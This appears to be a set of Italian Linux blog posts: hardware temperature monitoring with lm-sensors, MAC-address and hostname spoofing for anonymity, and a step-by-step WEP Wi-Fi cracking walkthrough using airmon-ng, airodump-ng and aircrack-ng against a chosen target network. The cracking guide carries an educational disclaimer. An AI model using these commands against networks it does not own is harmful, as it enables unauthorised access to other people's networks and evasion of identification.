Monitorare le temperature dell’hardware

Per tenere sotto controllo le temperature delle piu’ importanti componenti hardware del computer abbiamo bisogno di alcuni pacchetti che si installano con il seguente comando:

sudo apt-get install lm-sensors sensors-applet

Finita l’installazione eseguire il comando:

sudo sensors-detect

Rispondere YES (o SI se è Ubuntu in italiano) a tutte le domande.

Verificare che la rilevazione delle temperature avvenga correttamente digitando il comando:

sensors

Se si visualizza un output simile al seguente significa che l’installazione è andata a buon fine:

user@universe:~$ sensors
atk0110-acpi-0
Adapter: ACPI interface
Vcore Voltage: +1.16 V (min = +0.85 V, max = +1.60 V)
+3.3 Voltage: +3.25 V (min = +2.97 V, max = +3.63 V)
+5 Voltage: +5.11 V (min = +4.50 V, max = +5.50 V)
+12 Voltage: +11.93 V (min = +10.20 V, max = +13.80 V)
CPU FAN Speed: 1864 RPM (min = 600 RPM)
CHASSIS1 FAN Speed:1917 RPM (min = 600 RPM)
CHASSIS2 FAN Speed:2163 RPM (min = 600 RPM)
POWER FAN Speed: 0 RPM (min = 600 RPM)
CPU Temperature: +32.0°C (high = +60.0°C, crit = +95.0°C)
MB Temperature: +37.0°C (high = +45.0°C, crit = +95.0°C)

Effettuare il logout e di nuovo il login per caricare le applet dei sensori.

Aggiungere le icone dei sensori alla barra del desktop cliccando col tasto destro su un punto vuoto della barra e selezionando Add to panel (aggiungi al pannello). Scorrere le voci o usare il campo di ricerca per individuare Hardware Sensors Monitor e cliccare su Add (aggiungi). Per modificare le opzioni delle applet cliccare col destro sull’icona e selezionare Preferences (preferenze).

Annunci

Accorgimenti extra per navigare anonimi

Se avete letto la mini guida su come navigare anonimi con Tor potreste essere interessati a un paio di accorgimenti ulteriori per aumentare il livello di privacy quando navigate in Internet.

1) Cambiare l’indirizzo MAC della scheda:

sudo ifconfig eth0 down hw ether 00:00:00:00:00:00

(al posto degli zeri inserire dei valori fittizi)

Infine riattivare la scheda con:

sudo ifconfig eth0 up

2) Cambiare il nome del pc:

Per visualizzare il nome attuale del computer:

hostname

Per cambiare il nome del computer:

sudo hostname nuovo_nome

Entrambe queste modifiche vengono annullate automaticamente al riavvio del pc.

Guida rapida al wireless cracking (WEP)

***
Note: La presente guida è pubblicata esclusivamente a scopo didattico. Collegarsi a reti wireless senza l’autorizzazione del proprietario costituisce reato punibile penalmente. Il WEP è stato dichiarato non sicuro da anni, la sua diffusione attuale è molto limitata. Se la vostra rete wireless è cifrata utilizzando il WEP dovreste immediatamente proteggervi utilizzando la cifratura WPA o WPA2. Gli output del terminale sono stati in alcuni casi semplificati rimuovendo informazioni non rilevanti allo scopo di migliorare leggibilita’ e comprensione della guida.
***

Guida rapida al wireless cracking (WEP) – Prima parte

Per craccare una rete wireless con cifratura WEP sono sufficienti un pc dotato di scheda di rete Wi-Fi e un programma di nome aircrack-ng (ng sta per New Generation, essendo questa una versione aggiornata e piu’ evoluta di aircrack).

1) Installare aircrack-ng:

sudo apt-get install aircrack-ng

2) Avviare la modalita’ di monitoraggio (monitor mode):
Prima occorre disabilitare la scheda wireless:

sudo airmon-ng stop wlan0

Poi va riavviata in monitor mode:

sudo airmon-ng start wlan0

Nell’esempio il nome della scheda di rete è wlan0. Su un pc dotato di una scheda ethernet piu’ una wireless solitamente il nome è wlan0. Per trovare il nome della scheda di rete digitare da terminale il seguente comando:

ifconfig -a

Ecco l’output:

$ ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:22937 errors:0 dropped:0 overruns:0 frame:0
TX packets:19393 errors:0 dropped:0 overruns:0 carrier:1
collisions:0 txqueuelen:1000
RX bytes:22963442 (22.9 MB)  TX bytes:2411958 (2.4 MB)

wlan0     Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

3) Visualizziamo le reti wireless intorno a noi con il comando:

sudo airodump-ng wlan0

Come si vede ci sono due reti, una con cifratura WPA mentre l’altra usa il WEP. I dati interessanti ai fini di questa guida sono:

* il campo BSSID, che mostra gli indirizzi MAC dei router/ap

* CH che è il canale di trasmissione

* ESSID che è il nome della rete wireless

Individuata la rete da attaccare, possiamo metterci all’opera iniziando a sniffare i pacchetti con:

sudo airodump-ng -c x –bssid xx:xx:xx:xx:xx:xx -w dump wlan0

Inserire al posto delle x i valori corretti di canale (CH) e BSSID.
Una volta sniffato un numero sufficiente di pacchetti, lanciare aircrack-ng sul file .cap generato nella home utente da airodump-ng:

sudo aircrack-ng -b xx:xx:xx:xx:xx:xx dump-01.cap

Ed ecco la chiave in formato HEX.